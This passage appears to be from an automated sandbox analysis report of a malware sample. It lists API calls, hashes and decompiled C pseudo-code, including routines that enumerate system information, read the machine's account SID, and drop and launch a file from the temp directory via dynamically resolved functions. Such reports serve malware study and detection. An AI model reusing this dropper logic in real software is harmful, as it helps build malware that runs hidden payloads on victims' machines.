                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 2427045233-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: 5ada2f572b2e85ac8c4fa73ecc0bbb65551f5054b72a889862a8587f0c395f2d
                                                                                                                                                                                                                                                                • Instruction ID: 79b44e58a062232d9865685bb367370b4bf6e090aab6090a9754ad71c5cfc366
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ada2f572b2e85ac8c4fa73ecc0bbb65551f5054b72a889862a8587f0c395f2d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CEC15930900229DFEB25DF64DC94BADBBB5FF55301F0081EAE95DAA251DB708A84CF21
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015375E
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?,00000000), ref: 001537E5
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00153813
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 001538A4
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 001538B3
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 001538C6
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 001538CE
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00153A1F
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00153A2B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Select$DeleteH_prolog3_
                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                • API String ID: 110854720-3887548279
                                                                                                                                                                                                                                                                • Opcode ID: c0b7f834ee26eac08f2b7487213494d1a1fe3facf111c4190f9a2de458ff0a58
                                                                                                                                                                                                                                                                • Instruction ID: 42b96785fc33e9d3c56732942700ec6609545f6a796aaa38929729c88860ecc6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0b7f834ee26eac08f2b7487213494d1a1fe3facf111c4190f9a2de458ff0a58
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DA16871D00208DFCF14EFA4D884AAEBBB5FF58341F204129E826AB261DB709E55CF10
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001351BF
                                                                                                                                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 00135260
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 0013526F
                                                                                                                                                                                                                                                                • CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 001352BA
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 001352CF
                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,-00000098), ref: 0013530A
                                                                                                                                                                                                                                                                • DrawIconEx.USER32(?,00000000,00000000,?,?,?,00000000,00000000,00000003), ref: 0013532B
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 0013533C
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00135345
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0013535A
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00135363
                                                                                                                                                                                                                                                                • DestroyCursor.USER32(?), ref: 001353B6
                                                                                                                                                                                                                                                                • DestroyCursor.USER32(?), ref: 001353C3
                                                                                                                                                                                                                                                                • DestroyCursor.USER32(?), ref: 001353CE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$CursorDeleteDestroy$IconSelect$CopyDrawFillH_prolog3_ImageInfoRect
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2617690191-0
                                                                                                                                                                                                                                                                • Opcode ID: ee0d5edac77bbf81f0cd77a9d156462c6d8b1625aa5f59907bfb7a8e1ed8daa9
                                                                                                                                                                                                                                                                • Instruction ID: 5d48c27a481fe18d026f746d22b88951310f883e6adaf3b73b491ceab057b009
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee0d5edac77bbf81f0cd77a9d156462c6d8b1625aa5f59907bfb7a8e1ed8daa9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA6124B1900609DFDB15DFA4E849AEEBBBAFB58700F258129F801A7261DB709D41CF60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                                			E000D1828(void* __ecx) {
                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                                				long _t11;
                                                                                                                                                                                                                                                                				signed int _t14;
                                                                                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                                                                                				void* _t25;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t27;
                                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t32 = 0;
                                                                                                                                                                                                                                                                				_t27 = 0;
                                                                                                                                                                                                                                                                				_v8 = _v8 & 0;
                                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                                					if(_t27 != 0) {
                                                                                                                                                                                                                                                                						L3:
                                                                                                                                                                                                                                                                						_t7 =  *_t27(5, _t32, _v8,  &_v8);
                                                                                                                                                                                                                                                                						if(_t7 != 0xc0000004) {
                                                                                                                                                                                                                                                                							if(_t7 != 0) {
                                                                                                                                                                                                                                                                								if(_t32 != 0) {
                                                                                                                                                                                                                                                                									HeapFree(GetProcessHeap(), 0, _t32);
                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                								L18:
                                                                                                                                                                                                                                                                								_t8 = 0;
                                                                                                                                                                                                                                                                								L19:
                                                                                                                                                                                                                                                                								return _t8;
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							L11:
                                                                                                                                                                                                                                                                							if(_t32 == 0) {
                                                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							_t11 =  *_t32;
                                                                                                                                                                                                                                                                							_t25 = _t32;
                                                                                                                                                                                                                                                                							_t30 = 1;
                                                                                                                                                                                                                                                                							while(_t11 != 0) {
                                                                                                                                                                                                                                                                								_t25 = _t25 + _t11;
                                                                                                                                                                                                                                                                								_t30 = _t30 + 1;
                                                                                                                                                                                                                                                                								_t11 =  *_t25;
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                							HeapFree(GetProcessHeap(), _t11, _t32);
                                                                                                                                                                                                                                                                							_t8 = _t30;
                                                                                                                                                                                                                                                                							goto L19;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						_t14 = _v8;
                                                                                                                                                                                                                                                                						if(_t14 == 0) {
                                                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t27 = GetProcAddress(LoadLibraryA("NTDLL.DLL"), "ZwQuerySystemInformation");
                                                                                                                                                                                                                                                                					if(_t27 == 0) {
                                                                                                                                                                                                                                                                						goto L11;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                                					_push(_t14 + 1);
                                                                                                                                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                                                                                                                                						_t17 = HeapAlloc(GetProcessHeap(), 8, ??);
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t17 = HeapReAlloc(GetProcessHeap(), 8, _t32, ??);
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t32 = _t17;
                                                                                                                                                                                                                                                                				} while (_t32 != 0);
                                                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                                0x000d1835
                                                                                                                                                                                                                                                                0x000d1837
                                                                                                                                                                                                                                                                0x000d1839
                                                                                                                                                                                                                                                                0x000d183c
                                                                                                                                                                                                                                                                0x000d183e
                                                                                                                                                                                                                                                                0x000d185d
                                                                                                                                                                                                                                                                0x000d1867
                                                                                                                                                                                                                                                                0x000d186e
                                                                                                                                                                                                                                                                0x000d18a0
                                                                                                                                                                                                                                                                0x000d18c9
                                                                                                                                                                                                                                                                0x000d18d1
                                                                                                                                                                                                                                                                0x000d18d1
                                                                                                                                                                                                                                                                0x000d18d7
                                                                                                                                                                                                                                                                0x000d18d7
                                                                                                                                                                                                                                                                0x000d18d9
                                                                                                                                                                                                                                                                0x000d18df
                                                                                                                                                                                                                                                                0x000d18df
                                                                                                                                                                                                                                                                0x000d18a2
                                                                                                                                                                                                                                                                0x000d18a4
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d18a6
                                                                                                                                                                                                                                                                0x000d18aa
                                                                                                                                                                                                                                                                0x000d18ac
                                                                                                                                                                                                                                                                0x000d18b4
                                                                                                                                                                                                                                                                0x000d18af
                                                                                                                                                                                                                                                                0x000d18b1
                                                                                                                                                                                                                                                                0x000d18b2
                                                                                                                                                                                                                                                                0x000d18b2
                                                                                                                                                                                                                                                                0x000d18bd
                                                                                                                                                                                                                                                                0x000d18c3
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d18c3
                                                                                                                                                                                                                                                                0x000d1870
                                                                                                                                                                                                                                                                0x000d1875
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1875
                                                                                                                                                                                                                                                                0x000d1857
                                                                                                                                                                                                                                                                0x000d185b
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1877
                                                                                                                                                                                                                                                                0x000d1878
                                                                                                                                                                                                                                                                0x000d187b
                                                                                                                                                                                                                                                                0x000d1890
                                                                                                                                                                                                                                                                0x000d187d
                                                                                                                                                                                                                                                                0x000d1883
                                                                                                                                                                                                                                                                0x000d1883
                                                                                                                                                                                                                                                                0x000d1896
                                                                                                                                                                                                                                                                0x000d1898
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(NTDLL.DLL,ZwQuerySystemInformation), ref: 000D184A
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1851
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?), ref: 000D1880
                                                                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 000D1883
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 000D188D
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 000D1890
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D18BA
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D18BD
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D18CE
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D18D1
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                • String ID: NTDLL.DLL$ZwQuerySystemInformation
                                                                                                                                                                                                                                                                • API String ID: 2708089030-2445179936
                                                                                                                                                                                                                                                                • Opcode ID: a88409a762784f2c029f654abcbfe4db3a1851bde3c25a512d3f15c70bf62149
                                                                                                                                                                                                                                                                • Instruction ID: e391bf76f0122ca89ecceb9db27404713af22bf00c5f24784dede8b42d549fdb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a88409a762784f2c029f654abcbfe4db3a1851bde3c25a512d3f15c70bf62149
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD118472E423147BE76196A5AC48BBF7A9CEF45B95F110116FE09D7340DE74CC0166B0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000004,?), ref: 0012C220
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 0012C229
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0012C23A
                                                                                                                                                                                                                                                                • SetPropW.USER32(?,00000000), ref: 0012C24A
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0012C255
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 0012C2FB
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0012C307
                                                                                                                                                                                                                                                                • GetCapture.USER32 ref: 0012C314
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 0012C323
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0012C3FD
                                                                                                                                                                                                                                                                • GetActiveWindow.USER32 ref: 0012C407
                                                                                                                                                                                                                                                                • SetActiveWindow.USER32(00000000), ref: 0012C413
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0012C451
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Global$Enable$Active$AllocCaptureEnabledFreeMessagePropSendWire
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3599030855-0
                                                                                                                                                                                                                                                                • Opcode ID: 7f4212e69d3f97c1696f8abf00cf98b23a1e73a172582edf97f3d5bf9a4ae614
                                                                                                                                                                                                                                                                • Instruction ID: f9890671e9f2d3842d7435e148e262ca34b91589bd36978850523af24d76bdda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f4212e69d3f97c1696f8abf00cf98b23a1e73a172582edf97f3d5bf9a4ae614
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3391E430B00626EBDB18AFB4E859BAEB7A8BF54310F144529FA15D7281DF74D861CBD0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 87%
                                                                                                                                                                                                                                                                			E000D1725(void* __edx) {
                                                                                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                                                                                				short _v108;
                                                                                                                                                                                                                                                                				union _SID_NAME_USE _v112;
                                                                                                                                                                                                                                                                				long _v116;
                                                                                                                                                                                                                                                                				long _v120;
                                                                                                                                                                                                                                                                				char* _t19;
                                                                                                                                                                                                                                                                				long _t28;
                                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                                				void* _t45;
                                                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                                                				intOrPtr* _t47;
                                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t51 = 5;
                                                                                                                                                                                                                                                                				_v108 = 0x2f;
                                                                                                                                                                                                                                                                				_t19 =  &_v96;
                                                                                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                                                                                				__imp__GetComputerNameExW(0, _t19,  &_v108);
                                                                                                                                                                                                                                                                				if(_t19 == 0 || LookupAccountNameW(0,  &_v108, 0,  &_v116,  &_v108,  &_v120,  &_v112) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                                                					L15:
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_t28 = _v116;
                                                                                                                                                                                                                                                                					if(_t28 == 0) {
                                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t52 = HeapAlloc(GetProcessHeap(), 8, _t28 + 1);
                                                                                                                                                                                                                                                                					if(_t52 == 0) {
                                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					if(LookupAccountNameW(0,  &_v108, _t52,  &_v116,  &_v108,  &_v120,  &_v112) == 0) {
                                                                                                                                                                                                                                                                						HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t40 =  *(_t52 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                					if(_t40 < _t51) {
                                                                                                                                                                                                                                                                						_t51 = _t40;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					_t16 = _t52 + 8; // 0x8
                                                                                                                                                                                                                                                                					_t47 = _t16;
                                                                                                                                                                                                                                                                					_t50 = _t51 << 2;
                                                                                                                                                                                                                                                                					if(_t45 == 0 || _t47 == 0 || _t50 == 0) {
                                                                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                                                                						HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                                                                                                                                                                						return _t51;
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t46 = _t45 - _t47;
                                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                                							 *((char*)(_t46 + _t47)) =  *_t47;
                                                                                                                                                                                                                                                                							_t47 = _t47 + 1;
                                                                                                                                                                                                                                                                							_t50 = _t50 - 1;
                                                                                                                                                                                                                                                                						} while (_t50 != 0);
                                                                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                0x000d172e
                                                                                                                                                                                                                                                                0x000d1733
                                                                                                                                                                                                                                                                0x000d173c
                                                                                                                                                                                                                                                                0x000d1744
                                                                                                                                                                                                                                                                0x000d1746
                                                                                                                                                                                                                                                                0x000d174e
                                                                                                                                                                                                                                                                0x000d181e
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d178c
                                                                                                                                                                                                                                                                0x000d178c
                                                                                                                                                                                                                                                                0x000d1792
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d17ab
                                                                                                                                                                                                                                                                0x000d17af
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d17d5
                                                                                                                                                                                                                                                                0x000d1818
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1818
                                                                                                                                                                                                                                                                0x000d17d7
                                                                                                                                                                                                                                                                0x000d17dd
                                                                                                                                                                                                                                                                0x000d17df
                                                                                                                                                                                                                                                                0x000d17df
                                                                                                                                                                                                                                                                0x000d17e3
                                                                                                                                                                                                                                                                0x000d17e3
                                                                                                                                                                                                                                                                0x000d17e6
                                                                                                                                                                                                                                                                0x000d17eb
                                                                                                                                                                                                                                                                0x000d1802
                                                                                                                                                                                                                                                                0x000d1808
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d17f5
                                                                                                                                                                                                                                                                0x000d17f5
                                                                                                                                                                                                                                                                0x000d17f7
                                                                                                                                                                                                                                                                0x000d17f9
                                                                                                                                                                                                                                                                0x000d17fc
                                                                                                                                                                                                                                                                0x000d17fd
                                                                                                                                                                                                                                                                0x000d17fd
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d17f7
                                                                                                                                                                                                                                                                0x000d17eb

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetComputerNameExW.KERNEL32(00000000,?,00000100), ref: 000D1746
                                                                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 000D176F
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 000D177D
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 000D17A2
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 000D17A5
                                                                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,?,?,?), ref: 000D17CD
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1805
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D1808
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1815
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D1818
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$NameProcess$AccountFreeLookup$AllocComputerErrorLast
                                                                                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                                                                                • API String ID: 2409119217-2043925204
                                                                                                                                                                                                                                                                • Opcode ID: 9c8ad6cae950463dc4c723985ab921314512448763078a9900723b411b8b4dd3
                                                                                                                                                                                                                                                                • Instruction ID: 9c6547ba0fe9ef0073124660ece96cffb27d026960a4124419c20d40a3e08cc4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c8ad6cae950463dc4c723985ab921314512448763078a9900723b411b8b4dd3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531A0726083057BE321CBA1DC48EAB7BECEB89741F04092BFA86C2140EF34D9098771
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                                                                			E000D10DD(void* __ecx) {
                                                                                                                                                                                                                                                                				long _t19;
                                                                                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                                                                                				intOrPtr _t25;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                                                				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                                                                                				signed int _t40;
                                                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                                                				void* _t52;
                                                                                                                                                                                                                                                                				int _t53;
                                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                                				void* _t55;
                                                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t54 = __ecx;
                                                                                                                                                                                                                                                                				_t50 =  *((intOrPtr*)(__ecx + 0xe));
                                                                                                                                                                                                                                                                				_t39 =  *((intOrPtr*)(__ecx + 0x12)) + __ecx;
                                                                                                                                                                                                                                                                				_t19 = GetTempPathA(0x104, _t55 + 0x54);
                                                                                                                                                                                                                                                                				wsprintfA(_t55 + 0x6c + _t19, "~%u.%s", GetTickCount(), _t54 + 0x16);
                                                                                                                                                                                                                                                                				_t24 = E000D13E1(_t55 + 0x78, _t39, _t50);
                                                                                                                                                                                                                                                                				_t56 = _t55 + 0x14;
                                                                                                                                                                                                                                                                				if(_t24 == 0) {
                                                                                                                                                                                                                                                                					return _t24 + 1;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t25 =  *((intOrPtr*)(_t54 + 0xd));
                                                                                                                                                                                                                                                                				if(_t25 != 0) {
                                                                                                                                                                                                                                                                					if(_t25 != 1) {
                                                                                                                                                                                                                                                                						_t40 = 0;
                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                						_t29 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t54 + 0x4e);
                                                                                                                                                                                                                                                                						if(_t29 == 0) {
                                                                                                                                                                                                                                                                							_t52 = 0;
                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                							_t52 =  *_t29(_t56 + 0x64);
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						if(_t52 != 0) {
                                                                                                                                                                                                                                                                							Sleep(0xffffffff);
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						_t40 = 0 | _t52 != 0x00000000;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_t53 = 0x44;
                                                                                                                                                                                                                                                                					_t40 = 0;
                                                                                                                                                                                                                                                                					memset(_t56 + 0x24, 0, _t53);
                                                                                                                                                                                                                                                                					_t57 = _t56 + 0xc;
                                                                                                                                                                                                                                                                					 *(_t57 + 0x20) = _t53;
                                                                                                                                                                                                                                                                					_t35 = GetProcAddress(LoadLibraryA("KERNEL32.DLL"), _t54 + 0x3e);
                                                                                                                                                                                                                                                                					if(_t35 != 0) {
                                                                                                                                                                                                                                                                						_t40 =  *_t35(_t57 + 0x88, 0, 0, 0, 0, 0, 0, 0, _t57 + 0x24, _t57 + 0x10);
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				return _t40;
                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                0x000d10ea
                                                                                                                                                                                                                                                                0x000d10f6
                                                                                                                                                                                                                                                                0x000d10f9
                                                                                                                                                                                                                                                                0x000d10fb
                                                                                                                                                                                                                                                                0x000d111a
                                                                                                                                                                                                                                                                0x000d1127
                                                                                                                                                                                                                                                                0x000d112c
                                                                                                                                                                                                                                                                0x000d1131
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1133
                                                                                                                                                                                                                                                                0x000d1139
                                                                                                                                                                                                                                                                0x000d113e
                                                                                                                                                                                                                                                                0x000d1193
                                                                                                                                                                                                                                                                0x000d11d1
                                                                                                                                                                                                                                                                0x000d1195
                                                                                                                                                                                                                                                                0x000d11a5
                                                                                                                                                                                                                                                                0x000d11ad
                                                                                                                                                                                                                                                                0x000d11ba
                                                                                                                                                                                                                                                                0x000d11af
                                                                                                                                                                                                                                                                0x000d11b6
                                                                                                                                                                                                                                                                0x000d11b6
                                                                                                                                                                                                                                                                0x000d11be
